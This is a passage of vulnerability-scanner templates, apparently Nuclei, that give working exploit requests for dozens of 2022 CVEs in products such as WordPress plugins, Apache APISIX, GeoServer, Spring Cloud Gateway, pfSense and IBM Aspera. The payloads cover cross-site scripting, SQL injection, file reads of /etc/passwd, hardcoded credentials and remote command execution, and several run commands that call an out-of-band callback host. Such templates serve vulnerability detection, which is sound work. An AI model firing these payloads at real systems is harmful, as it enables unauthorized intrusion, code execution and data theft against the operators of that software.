Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertSuccess(\"</script><script>alert(document.cookie);</script>","text: \"</script><script>alert(document.cookie);</script>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0149","info":{"name":"WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24112","info":{"name":"Apache APISIX - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apisix/batch-requests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n\n{\n  \"headers\":{\n    \"X-Real-IP\":\"127.0.0.1\",\n    \"Content-Type\":\"application/json\"\n  },\n  \"timeout\":1500,\n  \"pipeline\":[\n    {\n      \"method\":\"PUT\",\n      \"path\":\"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\",\n      \"body\":\"{\\r\\n \\\"name\\\": \\\"test\\\", \\\"method\\\": [\\\"GET\\\"],\\r\\n \\\"uri\\\": \\\"/api/{{randstr}}\\\",\\r\\n \\\"upstream\\\":{\\\"type\\\":\\\"roundrobin\\\",\\\"nodes\\\":{\\\"httpbin.org:80\\\":1}}\\r\\n,\\r\\n\\\"filter_func\\\": \\\"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\\\"}\"\n    }\n  ]\n}\n","GET /api/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"reason\":\"OK\"","\"status\":200"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-25488","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/{{md5(num)}}","avatar-container"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44951","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-26960","info":{"name":"elFinder <=2.1.60 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29153","info":{"name":"HashiCorp Consul/Consul Enterprise - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["PUT /v1/agent/check/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":\"{{randstr}}\",\"name\":\"TEST NODE\",\"method\":\"GET\",\"http\":\"http://example.com\",\"interval\":\"10s\",\"timeout\":\"1s\",\"disable_redirects\":true}\n","PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["unknown field \"disable_redirects\""]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-0817","info":{"name":"WordPress BadgeOS <=3.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, md5(num))","contains(content_type, \"application/json\")","contains(body, \"badgeos-arrange-buttons\")"],"condition":"and"}]}]},{"id":"CVE-2022-0653","info":{"name":"Wordpress Profile Builder Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"javascript:alert(document.domain);\">here</a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0432","info":{"name":"Mastodon Prototype Pollution Vulnerability","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/embed.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["if (data.type !== 'setHeight' || !iframes[data.id]) {"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0140","info":{"name":"WordPress Visual Form Builder <3.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin.php?page=vfb-export HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}/wp-admin/admin.php?page=vfb-export\nContent-Type: application/x-www-form-urlencoded\nOrigin: {{RootURL}}\n\nvfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Date Submitted\"","\"Entries ID\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0540","info":{"name":"Atlassian Jira Seraph - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General Insight Configuration"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1013","info":{"name":"WordPress Personal Dictionary <1.3.4 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1)+AND+(SELECT+3066+FROM+(SELECT(SLEEP(5)))CEHy)--+-\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"\\\"status\\\":true,\")"],"condition":"and"}]}]},{"id":"CVE-2022-4295","info":{"name":"Show all comments < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"Select </option>\")"],"condition":"and"}]}]},{"id":"CVE-2022-26833","info":{"name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","severity":"critical"},"requests":[{"raw":["POST /OASREST/v2/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\nContent-Type: application/json\n\n{\"username\": \"\", \"password\": \"\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"status\":","\"data\":","\"token\":","\"clientid\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27593","info":{"name":"QNAP QTS Photo Station External Reference - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php."],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["!function(p,qa){","module.exports","application/javascript"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4140","info":{"name":"WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd","{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30073","info":{"name":"WBCE CMS 1.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<p><b><script>alert(document.cookie)</script>","WBCECMS"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"formtoken","group":1,"regex":["<input\\stype=\"hidden\"\\sname=\"formtoken\"\\svalue=\"([^\"]*)\"\\s/>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-28219","info":{"name":"Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/agent/tabs/agentData"],"body":"[\n  {\n    \"DomainName\": \"{{Host}}\",\n    \"EventCode\": 4688,\n    \"EventType\": 0,\n    \"TimeGenerated\": 0,\n    \"Task Content\": \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><! foo [ <!ENTITY % xxe SYSTEM \\\"http://{{interactsh-url}}\\\"> %xxe; ]>\"\n  }\n]\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["ManageEngine"]}]}]},{"id":"CVE-2022-44947","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=&notes=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0948","info":{"name":"WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/olistener/new HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/json\n\n{\"id\":\" (SLEEP(6))#\"}\n","GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"application/json\")","contains(body_2, \"olistener-action.olistener-controller\")"],"condition":"and"}]}]},{"id":"CVE-2022-29009","info":{"name":"Cyber Cafe Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ccms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=%27+Or+1--+-&password=1&login=\n","GET /ccms/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CCMS Admin Dashboard","CCMS ADMIN | Admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43014","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1)\"></a>%20<script>alert(document.domain)</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23347","info":{"name":"BigAnt Server v5.6.06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28290","info":{"name":"WordPress Country Selector <1.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US\n"],"cookie-reuse":true,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","country_selector_"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38463","info":{"name":"ServiceNow - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["top.location.href = 'javascript:alert(document.domain)';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2467","info":{"name":"Garage Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["Garage Billing Software"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24816","info":{"name":"GeoServer <1.2.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /geoserver/wms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n  <wps:Execute version=\"1.0.0\" service=\"WPS\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns=\"http://www.opengis.net/wps/1.0.0\" xmlns:wfs=\"http://www.opengis.net/wfs\" xmlns:wps=\"http://www.opengis.net/wps/1.0.0\" xmlns:ows=\"http://www.opengis.net/ows/1.1\" xmlns:gml=\"http://www.opengis.net/gml\" xmlns:ogc=\"http://www.opengis.net/ogc\" xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n    <ows:Identifier>ras:Jiffle</ows:Identifier>\n    <wps:DataInputs>\n      <wps:Input>\n        <ows:Identifier>coverage</ows:Identifier>\n        <wps:Data>\n          <wps:ComplexData mimeType=\"application/arcgrid\"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999  316]]></wps:ComplexData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>script</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>dest = y() - (500); // */ public class Double {    public static double NaN = 0;  static { try {  java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream())); String line = null; String allLines = \" - \"; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>outputType</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>DOUBLE</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n    </wps:DataInputs>\n    <wps:ResponseForm>\n      <wps:RawDataOutput mimeType=\"image/tiff\">\n        <ows:Identifier>result</ows:Identifier>\n      </wps:RawDataOutput>\n    </wps:ResponseForm>\n  </wps:Execute>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","ExceptionInInitializerError"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26138","info":{"name":"Atlassian Questions For Confluence - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action\n"],"payloads":{"os_username":["disabledsystemuser"],"os_password":["disabled1system1user6708"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["location == \"/httpvoid.action\""]}]}]},{"id":"CVE-2022-24288","info":{"name":"Apache Airflow OS Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command","{{BaseURL}}/code?dag_id=example_passing_params_via_test_command"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["foo was passed in via Airflow CLI Test command with value {{ params.foo }}"]}]}]},{"id":"CVE-2022-25125","info":{"name":"MCMS 5.2.4  - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-25082","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1\nHost: {{Hostname}}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0595","info":{"name":"WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161\n\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"size_limit\"\n\n10485760\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.svg\"\nContent-Type: image/jpeg\n\n<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"/>\n-----------------------------92633278134516118923780781161--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"alert(document.domain)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-46463","info":{"name":"Harbor <=2.5.3 - Unauthorized Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v2.0/search?q=/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository_name","project_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32028","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45354","info":{"name":"Download Monitor <= 4.7.60 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/download-monitor/v1/user_data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered\":","\"display_name\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22947","info":{"name":"Spring Cloud Gateway Code Injection","severity":"critical"},"requests":[{"raw":["POST /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicates\": [\n    {\n      \"name\": \"Path\",\n      \"args\": {\n        \"_genkey_0\": \"/{{randstr}}/**\"\n      }\n    }\n  ],\n  \"filters\": [\n    {\n      \"name\": \"RewritePath\",\n      \"args\": {\n        \"_genkey_0\": \"#{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")}\",\n        \"_genkey_1\": \"/${path}\"\n      }\n    }\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","POST /actuator/gateway/refresh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicate\": \"Paths: [/{{randstr}}], match trailing slash: true\",\n  \"route_id\": \"{{randstr}}\",\n  \"filters\": [\n    \"[[RewritePath #{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")} = /${path}], order = 1]\"\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/routes/{{randstr}}"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2022-4897","info":{"name":"WordPress BackupBuddy <8.8.3 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.11\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"onload=alert(document.domain)\")","contains(body_2, \"BackupBudddy iFrame\")"],"condition":"and"}]}]},{"id":"CVE-2022-31814","info":{"name":"pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /pfblockerng/www/index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n","GET /pfblockerng/www/index.php HTTP/1.1\nHost: ' *; host {{interactsh-url}}; '\nAccept: */*\n\n"],"unsafe":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"GIF\")"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2022-0169","info":{"name":"Photo Gallery by 10Web < 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43018","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>:0"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2379","info":{"name":"WordPress Easy Student Results <=2.2.8 - Improper Authorization","severity":"high"},"requests":[{"raw":["GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"departments\":","batches\":"],"condition":"and"},{"type":"word","part":"body_2","words":["meta_data","\"name\":\"","\"registration_no\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47986","info":{"name":"IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /aspera/faspex/package_relay/relay_package HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"package_file_list\": [\"/\"], \"external_emails\": \"\\n---\\n- !ruby/object:Gem::Installer\\n    i: x\\n- !ruby/object:Gem::SpecFetcher\\n    i: y\\n- !ruby/object:Gem::Requirement\\n  